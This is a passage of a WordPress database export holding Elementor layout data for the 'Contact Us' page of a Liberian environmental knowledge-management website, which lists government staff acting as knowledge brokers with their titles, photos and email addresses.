Inner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23433,3407,'_elementor_edit_mode','builder'),(23434,3407,'_elementor_template_type','wp-page'),(23435,3407,'_elementor_version','3.0.16'),(23436,3407,'_wp_page_template','default'),(23437,3407,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_